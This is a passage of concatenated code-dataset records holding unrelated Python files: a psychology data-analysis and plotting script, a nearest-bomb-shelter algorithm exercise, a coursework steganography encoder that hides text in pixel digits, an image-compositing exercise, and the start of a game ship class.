['bias2','bias1','eoptimal', 'ignore', 'switch','memory','perseverance','permem']:\n df[models + '_choice'] = (df[models + '_posterior']>.5).astype(int)\n df[models + '_certainty'] = (abs(df[models + '_posterior']-.5))/.5\n\nswitch_sums = []\ntrials_since_switch = 0\nfor i,row in df.iterrows():\n if row['switch'] == 1 or pd.isnull(row['switch']):\n trials_since_switch = 0\n else:\n trials_since_switch += 1\n switch_sums.append(trials_since_switch)\ndf['trials_since_switch'] = switch_sums\n\n\n# *********************************************\n# Selection Criterion\n# ********************************************* \n## Exclude subjects based on behavioral criteria\nselect_ids = gtest_df.groupby('id').mean().stim_conform>.75\nselect_ids = list(select_ids[select_ids].index)\nutter_failures = df.query('id not in %s' % select_ids)\ndf = df.query('id in %s' % select_ids)\n\n\n\ngroup_means = df.groupby('id')['correct'].mean() \nk = range(1,10)\nk_error = []\nfor k_i in k: \n c,label = scipy.cluster.vq.kmeans2(group_means,k_i)\n k_error.append(np.sum(np.power([c[i] for i in label]-group_means,2)))\n\n#exclude subjects based on percent correct\nx = df.groupby('id')['correct'].mean() \nc,label = scipy.cluster.vq.kmeans2(group_means,np.array([.49,.51]))\n\n\n\n# *********************************************\n# Model Comparison\n# ********************************************* \ncompare_df = df\ncompare_df_subset = compare_df.filter(regex = 'subj_ts|.*posterior_cross$')\nmodel_subj_compare = compare_df_subset.corr()\n\nlog_posteriors = pd.DataFrame()\nfor model in compare_df_subset.columns[1:]:\n log_posteriors[model] = np.log(abs(compare_df_subset.subj_ts-(1-compare_df_subset[model])))\n\n\ncompare_df = pd.concat([compare_df[['id','subj_ts','context']], log_posteriors], axis = 1)\ncompare_df['random_log'] = np.log(.5)\n\nsummary = compare_df.groupby('id').sum().drop(['context','subj_ts'],axis = 1)\n\nnum_params = [3,2,1,1,3,3,4,1,0]\nparam_cost_df = np.log(df.groupby('id').count()).iloc[:,0:len(summary.columns)]*num_params\nparam_cost_df.columns = summary.columns\nBIC_summary = -2*summary + param_cost_df\n\n#extract column of best model\nmin_col = BIC_summary.idxmin(1)\nbest_models = min_col.map(lambda x: x[:x.find('_')])\nbayes_models = [i in ['bias2', 'bias1', 'ignore', 'eoptimal'] for i in best_models]\nmem_models = [i in ['memory', 'perseverance','permem'] for i in best_models]\n\nbest_posterior = []\nfor i in range(len(best_models)):\n subj_id = best_models.index[i]\n model = best_models[i]\n subj_df = df.query('id == \"%s\"' % subj_id)\n if model == 'random':\n best_posterior += [.5]*len(subj_df)\n else:\n best_posterior += list(subj_df[model + '_posterior'])\n \ndf['best_posterior'] = best_posterior\ndf['best_choice'] = (df['best_posterior']>.5).astype(int)\ndf['best_certainty'] = (abs(df['best_posterior']-.5))/.5\n\nall_df = df.copy()\nids = np.unique(df['id'])\nselect_ids = list(ids[label==1])\ndf_nonlearners = df.query('id not in %s' % select_ids)\ndf = df.query('id in %s' % select_ids)\n\n# *********************************************\n# Behavioral Analysis\n# ********************************************* \n#train analysis\ngtrain_df.loc[:,'last_FB'] = gtrain_df['FB'].shift()\ngtrain_df.loc[:,'last_choice'] = gtrain_df['subj_ts'].shift()\ngtrain_df.loc[df.index == 0,['last_FB','last_choice']] = np.nan\n\nparams = []\npvals = []\nformula = 'subj_ts ~ context + last_choice * last_FB'\ndelays = list(range(26))\nfor i in delays[1:]:\n formula += ' + context.shift(%s)' % i\nfor i in np.unique(df['id']):\n res = smf.glm(formula = formula, data = gtrain_df.query('id == \"%s\"' %i), family = sm.families.Binomial()).fit()\n params.append(res.params[1:]) \n pvals.append(res.pvalues[1:])\n\n\n#effect of last TS\ndf[['last_TS', 'bias2_last_choice']] = df[['subj_ts', 'bias2_choice']].shift(1)\ndf.loc[0,['last_TS','bias2_last_choice']]=np.nan\nformula = 'subj_ts ~ context'\ndelays = list(range(26))\nfor i in delays[1:]:\n formula += ' + context.shift(%s)' % i\n\n\nlearner_params = []\nfor i in np.unique(df['id']):\n res = smf.glm(formula = formula, data = df.query('id == \"%s\"' %i), family = sm.families.Binomial()).fit()\n learner_params.append(res.params[1:])\nlearner_params = pd.DataFrame(learner_params).mean()\n\nselect_ids = abs(df_nonlearners.groupby('id').subj_ts.mean()-.5)<.475\nselect_ids = list(select_ids[select_ids].index)\ndf_fail = df_nonlearners.query('id in %s' % select_ids)\nnonlearner_params = []\nfor i in np.unique(df_fail['id']):\n res = smf.glm(formula = formula, data = df_fail.query('id == \"%s\"' %i), family = sm.families.Binomial()).fit()\n nonlearner_params.append(res.params[1:])\nnonlearner_params = pd.DataFrame(nonlearner_params).mean()\n\n# *********************************************\n# Print Diagnostics\n# *********************************************\n\nif print_diagnoistic == True:\n for i in all_df.id.unique():\n id_df = all_df[all_df['id'] == i]\n if i in df.id.unique():\n print(i, 'learner, best: ', best_models.loc[i])\n else:\n print(i, 'nonlearner, best: ', best_models.loc[i])\n print('Pereseverance:', np.corrcoef(id_df.subj_ts,id_df.perseverance_choice)[1,0]) \n print('bias2:', np.corrcoef(id_df.subj_ts,id_df.bias2_choice)[1,0])\n print('bias1:', np.corrcoef(id_df.subj_ts,id_df.bias1_choice)[1,0]) \n print('')\n\n\n# *********************************************\n# Plotting\n# *********************************************\n\nif plot == True:\n contexts = np.unique(gtest_df.context)\n figdims = (16,12)\n fontsize = 20\n \n # ***************************\n # Plots for Learners - only using bayesian models\n # ***************************\n plot_df = df.copy()\n plot_df['rt'] = plot_df['rt']*1000\n plot_ids = np.unique(plot_df.id)\n \n # Plot task-set count by context value\n sns.set_style(\"darkgrid\", {\"axes.linewidth\": \"1.25\", \"axes.edgecolor\": \".15\"})\n p1 = plt.figure(figsize = figdims)\n plt.hold(True) \n plt.plot(plot_df.groupby('context').subj_ts.mean(), lw = 4, marker = 'o', markersize = 10, color = 'm', label = 'subject')\n plt.plot(plot_df.groupby('context').bias2_choice.mean(), lw = 4, marker = 'o', markersize = 10, color = 'c', label = 'bias-2 observer')\n plt.plot(plot_df.groupby('context').bias1_choice.mean(), lw = 4, marker = 'o', markersize = 10, color = 'c', ls = '--', label = 'bias-1 observer')\n plt.xticks(list(range(12)),contexts)\n plt.xlabel('Stimulus Vertical Position', size = fontsize)\n plt.ylabel('TS2 choice %', size = fontsize)\n pylab.legend(loc='best',prop={'size':20})\n for subj in plot_ids:\n subj_df = plot_df.query('id == \"%s\"' %subj)\n if subj_df.correct.mean() < .55:\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, color = 'r', alpha = .2)\n else:\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, color = 'k', alpha = .2)\n a = plt.axes([.62, .15, .3, .3])\n plt.plot(plot_df.groupby('context').subj_ts.mean(), lw = 4, marker = 'o', markersize = 10, color = 'm', label = 'subject')\n plt.plot(plot_df.groupby('context').eoptimal_choice.mean(), lw = 4, marker = 'o', markersize = 10, color = 'c', ls = '--', label = r'$\\epsilon$-optimal observer')\n plt.tick_params(\n axis = 'both',\n which = 'both',\n labelleft = 'off',\n labelbottom = 'off')\n pylab.legend(loc='upper left',prop={'size':14})\n \n\n # Plot task-set count by context value\n range_start = 0\n range_length = 7\n p2 = plt.figure(figsize = figdims)\n plt.hold(True) \n plt.xticks(list(range(12)),contexts)\n plt.xlabel('Stimulus Vertical Position', size = fontsize)\n plt.ylabel('TS2 choice %', size = fontsize)\n subj_df = plot_df.query('id == \"%s\"' %plot_ids[range_start])\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, alpha = 1, label = 'subject')\n for subj in plot_ids[range_start+1:range_start+range_length]:\n subj_df = plot_df.query('id == \"%s\"' %subj)\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, alpha = 1, label = '_nolegend_')\n plt.gca().set_color_cycle(None)\n subj_df = plot_df.query('id == \"%s\"' %plot_ids[range_start])\n plt.plot(subj_df.groupby('context').bias2_choice.mean(), lw = 2, ls = '--', label = 'bias-2 observer')\n for subj in plot_ids[range_start+1:range_start+range_length]:\n subj_df = plot_df.query('id == \"%s\"' %subj)\n plt.plot(subj_df.groupby('context').bias2_choice.mean(), lw = 2, ls = '--', label = '_nolegend_')\n pylab.legend(loc='best',prop={'size':20})\n\n \n # Plot rt against bias2 model posterior\n sns.set_context('poster')\n subj_df = plot_df.query('rt > 100 & id < \"%s\"' %plot_ids[4]) \n p3 = sns.lmplot(x='bias2_posterior',y='rt', hue = 'id', data = subj_df, order = 2, size = 6, col = 'id')\n p3.set_xlabels(\"P(TS2)\", size = fontsize)\n p3.set_ylabels('Reaction time (ms)', size = fontsize)\n p3.set_xticklabels(['',0,.2,.4,.6,.8,1,''])\n \n # Plot rt against bias2 model certainty\n # Take out RT < 100 ms \n sns.set_context('poster')\n subj_df = plot_df.query('rt > 100 & id < \"%s\"' %plot_ids[3]) \n p4 = sns.lmplot(x ='bias2_certainty', y = 'rt', hue = 'id', col = 'id', size = 6, data = subj_df) \n p4.set_xlabels(\"Model Confidence\", size = fontsize)\n p4.set_ylabels('Reaction time (ms)', size = fontsize)\n p4.set_xticklabels(['',0,.2,.4,.6,.8,1,''])\n \n p5 = sns.lmplot(x ='bias2_certainty', y = 'rt', hue = 'id', ci = None, legend = False, size = figdims[1], data = plot_df.query('rt>100')) \n plt.xlim(-.1,1.1)\n p5.set_xlabels(\"Model Confidence\", size = fontsize)\n p5.set_ylabels('Reaction time (ms)', size = fontsize)\n \n \n # plot bias2 parameters\n params_df = pd.DataFrame()\n params_df['id'] = [x[1:3] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df['learner'] = [x[0:3] in plot_ids for x in bias2_fit_dict if ('_fullRun' in x)] \n params_df['r1'] = [bias2_fit_dict[x]['r1'] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df['r2'] = [bias2_fit_dict[x]['r2'] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df['eps'] = [bias2_fit_dict[x]['TS_eps'] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df = pd.melt(params_df, id_vars = ['id','learner'], value_vars = ['eps','r1','r2'], var_name = 'param', value_name = 'val')\n\n p6 = plt.figure(figsize = figdims)\n ax = plt.subplot(111)\n box_palette = sns.color_palette(['m','c'], desat = 1)\n sns.boxplot(x = 'param', y = 'val', hue = 'learner', hue_order = [1,0], data = params_df, palette = box_palette)\n plt.xlabel(\"Parameter\", size = fontsize)\n plt.ylabel('Value', size = fontsize)\n plt.title('Bias-2 Model Parameter Fits', size = fontsize+4, y = 1.05)\n plt.xticks([0,1,2], ('$\\epsilon$','$r_1$','$r_2$'), size = fontsize)\n ax.legend(ax.get_legend_handles_labels()[0],['Learners','Non-learners'], loc = 'upper left')\n \n \n\n #look at models\n p7 = plt.figure(figsize = figdims)\n plt.hold(True)\n for c in log_posteriors.columns[:-1]:\n sns.kdeplot(summary[c])\n \n p8 = plt.figure(figsize = figdims)\n sns.heatmap(model_subj_compare)\n p9 = plt.figure(figsize = figdims)\n sns.heatmap(model_subj_compare.filter(regex='bias|eoptimal|ignore|subj_ts').corr())\n \n #********** Behavioral Plots **************************\n # look at RT\n p10 = plt.figure(figsize = figdims)\n plt.subplot(4,1,1)\n plot_df.rt.hist(bins = 25)\n plt.ylabel('Frequency', size = fontsize)\n \n plt.subplot(4,1,2) \n plt.hold(True)\n sns.kdeplot(plot_df.query('subj_switch == 0')['rt'],color = 'm', lw = 5, label = 'stay')\n sns.kdeplot(plot_df.query('subj_switch == 1')['rt'],color = 'c', lw = 5, label = 'switch')\n plot_df.query('subj_switch == 0')['rt'].hist(bins = 25, alpha = .4, color = 'm', normed = True)\n plot_df.query('subj_switch == 1')['rt'].hist(bins = 25, alpha = .4, color = 'c', normed = True)\n pylab.legend(loc='upper right',prop={'size':20})\n plt.xlim(xmin=0)\n\n \n plt.subplot(4,1,3)\n plt.hold(True)\n sns.kdeplot(plot_df.query('subj_switch == 0 and rep_resp == 1')['rt'], color = 'm', lw = 5, label = 'repeat response')\n sns.kdeplot(plot_df.query('subj_switch == 0 and rep_resp == 0')['rt'], color = 'c', lw = 5, label = 'change response (within task-set)')\n plot_df.query('subj_switch == 0 and rep_resp == 1')['rt'].hist(bins = 25, alpha = .4, color = 'm', normed = True)\n plot_df.query('subj_switch == 0 and rep_resp == 0')['rt'].hist(bins = 25, alpha = .4, color = 'c', normed = True)\n plt.ylabel('Probability Density', size = fontsize)\n pylab.legend(loc='upper right',prop={'size':20})\n plt.xlim(xmin=0)\n\n \n plt.subplot(4,1,4)\n plt.hold(True)\n sns.kdeplot(plot_df.query('subj_ts == 0')['rt'], color = 'm', lw = 5, label = 'TS1')\n sns.kdeplot(plot_df.query('subj_ts == 1')['rt'], color = 'c', lw = 5, label = 'TS2')\n plot_df.query('subj_ts == 0')['rt'].hist(bins = 25, alpha = .4, color = 'm', normed = True)\n plot_df.query('subj_ts == 1')['rt'].hist(bins = 25, alpha = .4, color = 'c', normed = True)\n plt.xlabel('Reaction Time (ms)', size = fontsize)\n pylab.legend(loc='upper right',prop={'size':20})\n plt.xlim(xmin=0)\n \n \n #***********************************\n # learner nonlearner behavioral plots\n #***********************************\n plot_df = pd.concat([df,df_fail])\n df.groupby(['last_TS','context']).subj_ts.mean().reset_index() \n \n p11 = plt.figure(figsize = figdims)\n p11.subplots_adjust(hspace=.3, wspace = .3)\n \n plt.subplot2grid((2,2),(0,0))\n sns.plt.plot(delays,learner_params, 'b-o', label = 'Learners', markersize = 10)\n sns.plt.plot(delays,nonlearner_params, 'r-o', label = 'Non-Learners', markersize = 10)\n plt.xlabel('Context Lag', size = fontsize)\n plt.ylabel('Beta Weights', size = fontsize)\n pylab.legend(loc='best',prop={'size':20})\n plt.tick_params(labelsize=15)\n \n plt.subplot2grid((2,2),(1,0), colspan = 1)\n sns.plt.scatter(range(len(group_means)),group_means, c = [['r','b'][i] for i in label])\n plt.ylabel('Accuracy', size = fontsize)\n plt.xlabel('Subject Index', size = fontsize)\n plt.xlim([-5,50])\n plt.tick_params(labelsize=15)\n \n plt.subplot2grid((2,2),(1,1), colspan = 1)\n sns.plt.plot(k,k_error, '-o')\n plt.ylabel('SSE', size = fontsize)\n plt.xlabel('Number of Clusters (k)', size = fontsize)\n plt.tick_params(labelsize=15)\n\n plt.subplot2grid((2,2),(0,1))\n for window in [(0,850)]:\n window_df = plot_df.query('trial_count >= %s and trials_since_switch < 27 and trial_count < %s' % (window[0], window[1]))\n plot_dict = {}\n for i in np.unique(window_df['id']):\n temp_df = window_df.query('id == \"%s\"' % i)\n plot_dict[i] = [temp_df.query('trials_since_switch == %s' % i)['correct'].mean() for i in np.unique(temp_df['trials_since_switch']) if np.sum(temp_df['trials_since_switch']==i)>5]\n plot_dict['trials_since_switch'] = list(range(max([len(arr) for arr in plot_dict.values()])))\n subplot_df = pd.DataFrame.from_dict(plot_dict, orient='index').transpose() \n \n subplot_df = pd.melt(subplot_df, id_vars = 'trials_since_switch', var_name = 'id', value_name = 'percent_correct')\n plt.scatter(subplot_df['trials_since_switch'], subplot_df['percent_correct'], color = 'b', alpha = .5) \n group = window_df.groupby('trials_since_switch').mean()['correct']\n plt.plot(group.index,group,'b-',lw = 4)\n\n for window in [(0,850)]:\n window_df = df_fail.query('trial_count >= %s and trials_since_switch < 27 and trial_count < %s' % (window[0], window[1]))\n plot_dict = {}\n for i in np.unique(window_df['id']):\n temp_df = window_df.query('id == \"%s\"' % i)\n plot_dict[i] = [temp_df.query('trials_since_switch == %s' % i)['correct'].mean() for i in np.unique(temp_df['trials_since_switch']) if np.sum(temp_df['trials_since_switch']==i)>5]\n plot_dict['trials_since_switch'] = list(range(max([len(arr) for arr in plot_dict.values()])))\n subplot_df = pd.DataFrame.from_dict(plot_dict, orient='index').transpose() \n \n subplot_df = pd.melt(subplot_df, id_vars = 'trials_since_switch', var_name = 'id', value_name = 'percent_correct')\n plt.scatter(subplot_df['trials_since_switch'], subplot_df['percent_correct'], color = 'r', alpha = .5) \n group = window_df.groupby('trials_since_switch').mean()['correct']\n plt.plot(group.index,group,'r-',lw = 4)\n plt.xlim(-1,28) \n plt.tick_params(labelsize=15)\n plt.ylabel('Percent Correct', size = fontsize)\n plt.xlabel('Trials Since Objective TS Switch', size = fontsize)\n\n if save == True:\n p1.savefig('../Plots/TS2%_vs_context.png', format = 'png', dpi = 300)\n p2.savefig('../Plots/Individual_subject_fits.png',format = 'png', dpi = 300)\n p3.savefig('../Plots/rt_vs_posterior_3subj.png', format = 'png', dpi = 300)\n p4.savefig('../Plots/rt_vs_confidence_3subj.png', format = 'png', dpi = 300)\n p5.savefig('../Plots/rt_vs_confidence.png', format = 'png', dpi = 300)\n p6.savefig('../Plots/bias2_param_value.png', format = 'png', dpi = 300)\n p7.savefig('../Plots/model_comparison.png', format = 'png', dpi = 300)\n p10.savefig('../Plots/RTs.png', format = 'png')\n p11.savefig('../Plots/Learner_vs_NonLearner.png', format = 'png', dpi = 300)\n plt.close('all')\n \n ","sub_path":"old_versions/Color_Shape_Task_V1/Analysis/Group_Analysis.py","file_name":"Group_Analysis.py","file_ext":"py","file_size_in_byte":20176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"18208723","text":"'''\nШтаб гражданской обороны Тридесятой области решил обновить план спасения на случай ядерной атаки. Известно, что все n\nселений Тридесятой области находятся вдоль одной прямой дороги. Вдоль дороги также расположены m бомбоубежищ, в которых\nжители селений могут укрыться на случай ядерной атаки.\nЧтобы спасение в случае ядерной тревоги проходило как можно эффективнее, необходимо для каждого селения определить\nближайшее к нему бомбоубежище.\nФормат ввода\nВ первой строке вводится число n - количество селений (1 <= n <= 100000). Вторая строка содержит n различных целых\nчисел, i-е из этих чисел задает расстояние от начала дороги до i-го селения. В третьей строке входных данных задается\nчисло m - количество бомбоубежищ (1 <= m <= 100000). Четвертая строка содержит m различных целых чисел, i-е из этих\nчисел задает расстояние от начала дороги до i-го бомбоубежища. Все расстояния положительны и не превышают 10⁹. Селение\nи убежище могут располагаться в одной точке.\nФормат вывода\nВыведите n чисел - для каждого селения выведите номер ближайшего к нему бомбоубежища. Бомбоубежища пронумерованы\nот 1 до m в том порядке, в котором они заданы во входных данных.\nУказание\nСоздайте список кортежей из пар (позиция селения, его номер в исходном списке), а также аналогичный список для\nбомбоубежищ. Отсортируйте эти списки.\nПеребирайте селения в поря��ке возрастания.\nДля селения ближайшими могут быть два соседних бомбоубежища, среди них надо выбрать ближайшее. При переходе к следующему\nселению не обязательно искать ближайшее бомбоубежище с самого начала. Его можно искать начиная с позиции, найденной для\nпредыдущего города. Аналогично, не нужно искать подходящее бомбоубежище до конца списка бомбоубежищ: достаточно найти\nсамое близкое. Если Вы неэффективно реализуете эту часть, то решение тесты не пройдет.\nДля хранения ответа используйте список, где индекс будет номером селения, а по этому индексу будет запоминаться номер\nбомбоубежища.\n'''\n# не проходит тест 6, может потом как-нить разберусь :)\n\ndef sort_position(n):\n # input data as a tuple with distance and index and sort it out\n tempData = list(map(int, input().split()))\n mylist = []\n for i in range(n):\n manData = (tempData[i], i)\n mylist.append(manData)\n mylist.sort()\n return mylist\n\n\ndef checker(villageList, shelterList):\n # finding nearest shelters before and after the village and comparing the distance to find the closest one\n answer = []\n i = 0\n j = 0\n s_distance_j, shelter_j = shelterList[0]\n while i < len(villageList) and j < len(shelterList):\n v_distance, village = villageList[i]\n s_distance, shelter = shelterList[j]\n if v_distance > s_distance:\n s_distance_j, shelter_j = shelterList[j]\n j += 1\n else:\n diff = abs(v_distance - s_distance)\n diff_j = abs(v_distance - s_distance_j)\n if diff < diff_j:\n answer.append((village + 1, shelter + 1))\n else:\n answer.append((village + 1, shelter_j + 1))\n i += 1\n # filling the answer with the last found shelter if shelters > villages\n for remain_part in range(i, len(villageList)):\n answer.append((i + 1, shelter_j + 1))\n answer.sort()\n return answer\n\n\ndef formatting(mylist):\n for item in mylist:\n print(item[1], end=' ')\n\n\nn = int(input())\nvillageList = sort_position(n)\nm = int(input())\nshelterList = sort_position(m)\n\nformatting(checker(villageList, shelterList))\n\n''' The version which worked out\n\namount_towns = int(input())\ntowns = list(enumerate(map(int, input().split()[:amount_towns]), 1))\namount_shelters = int(input())\nshelters = list(enumerate(map(int, input().split()[:amount_shelters]), 1))\ntowns.sort(key=lambda k: k[1])\nshelters.sort(key=lambda k: k[1])\n\nindex = 0\nresult = []\n\nfor town in towns:\n while (index + 1 < amount_shelters and \n abs(town[1] - shelters[index][1]) > abs(\n town[1] - shelters[index + 1][1])):\n index += 1\n else:\n result.append([town[0], shelters[index][0]])\n\nresult.sort()\nfor i in result:\n print(i[1], end=' ')\n'''\n","sub_path":"week6_bomb_shelters.py","file_name":"week6_bomb_shelters.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"552946396","text":"\"\"\"\nSteganography methods for the imager application.\n\nThis module provides all of the test processing operations (encode, decode)\nthat are called by the application.\n Note that this class is a subclass of Filter.\nThis allows us to layer this functionality on top of the Instagram-filters,\nproviding this functionality in one application.\n\nBased on an original file by Dexter Kozen (dck10) and Walker White (wmw2)\n\nAuthor: Yan Zhu yz2477 Aroma Dong jd778\nDate: 11/20/2019\n\"\"\"\nimport a6filter\n\n\nclass Encoder(a6filter.Filter):\n \"\"\"\n A class that contains a collection of image processing methods\n\n This class is a subclass of Filter. That means it inherits all of the\n methods and attributes of that class too. We do that separate the\n steganography methods from the image filter methods, making the code\n easier to read.\n\n Both the `encode` and `decode` methods should work with the most recent\n image in the edit history.\n \"\"\"\n\n def encode(self, text):\n \"\"\"\n Returns True if it could hide the text; False otherwise.\n\n This method attemps to hide the given message text in the current\n image. This method first converts the text to a byte list using the\n encode() method in string to use UTF-8 representation:\n\n blist = list(text.encode('utf-8'))\n\n This allows the encode method to support all text, including emoji.\n\n If the text UTF-8 encoding requires more than 999999 bytes or the\n picture does not have enough pixels to store these bytes this method\n returns False without storing the message. However, if the number of\n bytes is both less than 1000000 and less than (# pixels - 10), then\n the encoding should succeed. So this method uses no more than 10\n pixels to store additional encoding information.\n\n Parameter text: a message to hide\n Precondition: text is a string\n \"\"\"\n # You may modify anything in the above specification EXCEPT\n # The first line (Returns True...)\n # The last paragraph (If the text UTF-8 encoding...)\n # The precondition (text is a string)\n assert type(text) == str\n\n current = self.getCurrent()\n\n blist = list(text.encode('utf-8'))\n bnum = len(blist)\n if bnum>999999 or len(current)-10< bnum:\n return False\n\n self._encode_pixel_str(0,'314')\n self._encode_pixel_str(1,'159')\n self._encode_pixel_str(2,'265')\n self._encode_pixel_str(3,'358')\n self._encode_pixel_str(4,'979')\n\n bnum2 = '0'*(6-len(str(bnum)))+str(bnum)\n self._encode_pixel_str(5,bnum2[:3])\n self._encode_pixel_str(6,bnum2[3:])\n\n for p in range(bnum):\n num = str(blist[p])\n if len(num) < 3:\n num = '0'*(3-len(num))+num\n self._encode_pixel_str(7+p,num)\n return True\n\n def decode(self):\n \"\"\"\n Returns the secret message (a string) stored in the current image.\n\n The message should be decoded as a list of bytes. Assuming that a list\n blist has only bytes (ints in 0.255), you can turn it into a string\n using UTF-8 with the decode method:\n\n text = bytes(blist).decode('utf-8')\n\n If no message is detected, or if there is an error in decoding the\n message, this method returns None\n \"\"\"\n # You may modify anything in the above specification EXCEPT\n # The first line (Returns the secret...)\n # The last paragraph (If no message is detected...)\n marker = ''\n for n in range(5):\n marker = marker + str(self._decode_pixel(n))\n if marker != '314159265358979':\n return None\n\n try:\n blist = []\n len = self._decode_pixel(5)*1000 + self._decode_pixel(6)\n if len == 0:\n return ''\n for n in range(len):\n blist.append(self._decode_pixel(n+7))\n text = bytes(blist).decode('utf-8')\n return text\n except:\n return None\n\n # HELPER METHODS\n def _decode_pixel(self, pos):\n \"\"\"\n Return: the number n hidden in pixel pos of the current image.\n\n This function assumes that the value was a 3-digit number encoded as\n the last digit in each color channel (e.g. red, green and blue).\n\n Parameter pos: a pixel position\n Precondition: pos is an int with 0 <= p < image length (as a 1d list)\n \"\"\"\n # This is helper. You do not have to use it.\n #You are allowed to change it.\n # There are no restrictions on how you can change it.\n rgb = self.getCurrent()[pos]\n red = rgb[0]\n green = rgb[1]\n blue = rgb[2]\n return (red % 10) * 100 + (green % 10) * 10 + blue % 10\n\n def _encode_pixel_str(self, pos, str):\n \"\"\"\n Encodes the 3-digit number represented by the string in the pixel at\n the position pos in the current image.\n This function will take the string that represents a 3-digit\n number and encode it at the given position.\n The first digit will be encoded in red, the second\n will be encoded in green, and the third be encoded in blue.\n Encoding a byte value will result in an invalid rgb value (> 255)\n thus will be substracted from the tens place of the appropriate\n color value.\n\n Parameter pos: a pixel position\n Precondition: pos is an int and 0 <= p < image length\n Parameter str: a string representation of a number to encode\n Precondition: a str of a 3-digit integer\n \"\"\"\n rgb = self.getCurrent()[pos]\n red = rgb[0]\n green = rgb[1]\n blue = rgb[2]\n\n d1 = int(str[0])\n d2 = int(str[1])\n d3 = int(str[2])\n\n red = (red//10)*10 +d1\n green = (green//10)*10 +d2\n blue = (blue//10)*10 +d3\n\n if red>255:\n red = red-10\n if green>255:\n green = green-10\n if blue>255:\n blue = blue-10\n\n self.getCurrent()[pos] = (red,green,blue)\n","sub_path":"Imager/a6encode.py","file_name":"a6encode.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"18518180","text":"import matplotlib.pyplot as plt\r\nimport os.path\r\nimport numpy as np\r\nimport PIL\r\nimport PIL.ImageDraw\r\n\r\n#Open explosion picture in numpy\r\ndirectory = os.path.dirname(os.path.abspath(__file__))\r\nfilepath_explosion = os.path.join(directory, 'explosion.jpg')\r\nexplosion_numpy = plt.imread(filepath_explosion)\r\n\r\n#Open cat image in numpy\r\nfilepath_cat = os.path.join(directory, 'cat.jpg')\r\ncat_numpy = plt.imread(filepath_cat)\r\n\r\n#Open dog image in numpy\r\nfilepath_dog = os.path.join(directory, 'dog.jpg')\r\ndog_numpy = plt.imread(filepath_dog)\r\n\r\n#Convert all numpy images to PIL\r\nexplosion_image_pil = PIL.Image.fromarray(explosion_numpy)\r\ncat_image_pil = PIL.Image.fromarray(cat_numpy)\r\ndog_image_pil = PIL.Image.fromarray(dog_numpy)\r\n\r\n#(Attempting to) cut the background from the cat and dog pictures.\r\ncat_crop = cat_image_pil.crop((404, 262, 1659, 2182))\r\ndog_crop = dog_image_pil.crop((198, 83, 913, 884))\r\n\r\n#Reduce size of cat and dog to fit on explosion picture.\r\ncat_img_small = cat_crop.resize((250, 350))\r\ndog_img_small = dog_crop.resize((550, 380))\r\n\r\n#Place cat and dog on appropriate locations of explosion\r\nexplosion_image_pil.paste(cat_img_small,(877, 656))\r\nexplosion_image_pil.paste(dog_img_small,(304, 155))\r\n\r\n#Convert explosion image back to numpy\r\nexplosion_numpy = np.array(explosion_image_pil)\r\n\r\n#Recolor the cat's eyes to an evil red\r\nfor r in range(719, 730):\r\n for c in range(914, 931):\r\n if sum(explosion_numpy[r][c])< 550:\r\n explosion_numpy[r][c] = [255,0,0] \r\nfor r in range(720, 730):\r\n for c in range(958, 972):\r\n if sum(explosion_numpy[r][c])< 280:\r\n explosion_numpy[r][c] = [255,0,0] \r\n\r\n#Recolor the explosion to...green?\r\nfor r in range(531,847):\r\n for c in range(256,834):\r\n if sum(explosion_numpy[r][c]) > 350:\r\n explosion_numpy[r][c] = [0,177,0]\r\n\r\n#Display the completed image.\r\nfig, ax = plt.subplots(1, 1)\r\nax.imshow(explosion_numpy, interpolation='none')\r\nfig.show()\r\n\r\n#Photos taken from: Wikipedia (reuse with edit rights)","sub_path":"files/1.4 Project.py","file_name":"1.4 Project.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"121419663","text":"import misc, math, orders, pygame, effects\n\ntry:\n import psyco\n psyco.profile()\nexcept ImportError:\n pass\n\nclass Ship():\n #basic stats for drawing & position.\n radius = 8 # Size of the ship from the centre - size of largest part (if multiple parts are added)\n rotation = math.radians(270.0) # Initial rotation of the ship. Changes every now and then for testing, doesn't matter usually.\n # r43 : Changed to rotation instead of intRotation\n dead = False # I'M ALIVEEEE\n #speed stats.\n speed = 2.5\n rotateSpeed = 0.05 # Rotation\n\n health = 1 # integer for the health of the ship\n\n points = [] # List of veticies that make up the ship.\n\n formation = False\n \n def __init__(self, view, player, x, y):\n self.player = player\n self.view = view\n self.colour = self.player.colour\n self.x, self.y = x, y\n self.shieldRadius = self.radius + 2\n self.orders = [orders.Idle(self)]\n self.moving = False\n self.built = False\n self.calcPoints()\n self.calcExtras() # Stuff that isn't points but needs to be calced.\n \n def drawShield(self, hitBy):\n self.view.effects.append(effects.BubbleShield(self, self.view, (self.x, self.y), self.shieldRadius, 0))\n #self.view.effects.append(effects.AngleShield(self, self.view, (self.x, self.y), self.radius + 2, 0, hitBy))\n \n def damaged(self, amount, hitBy):\n self.health -= amount\n self.drawShield(hitBy)\n if self.health <= 0:\n self.die()\n \n def remove(self):\n self.dead = True\n for i in range(len(self.player.ships)):\n if self.player.ships[i] == self:\n del self.player.ships[i]\n break\n for i in range(len(self.view.selectedShips)):\n if self.view.selectedShips[i] == self:\n del self.view.selectedShips[i]\n break\n del self\n \n def die(self):\n self.view.effects.append(effects.ExplosionShip(self.view, self, 10))\n self.view.effects.append(effects.Explosion(self.view, (self.x, self.y), 0.5, (self.radius * 4), misc.WHITE))\n #and remove the ship when done.\n self.remove()\n #any player related stats go here. like death count and such. Dunno if we want need these but hum.\n\n def calcExtras(self):\n pass\n \n def draw(self):\n if self.needsToCalcPoints:\n self.calcPoints()\n #self.drawOrders()\n pygame.draw.polygon(self.view.screen, misc.BLACK, self.offsetPoints())\n 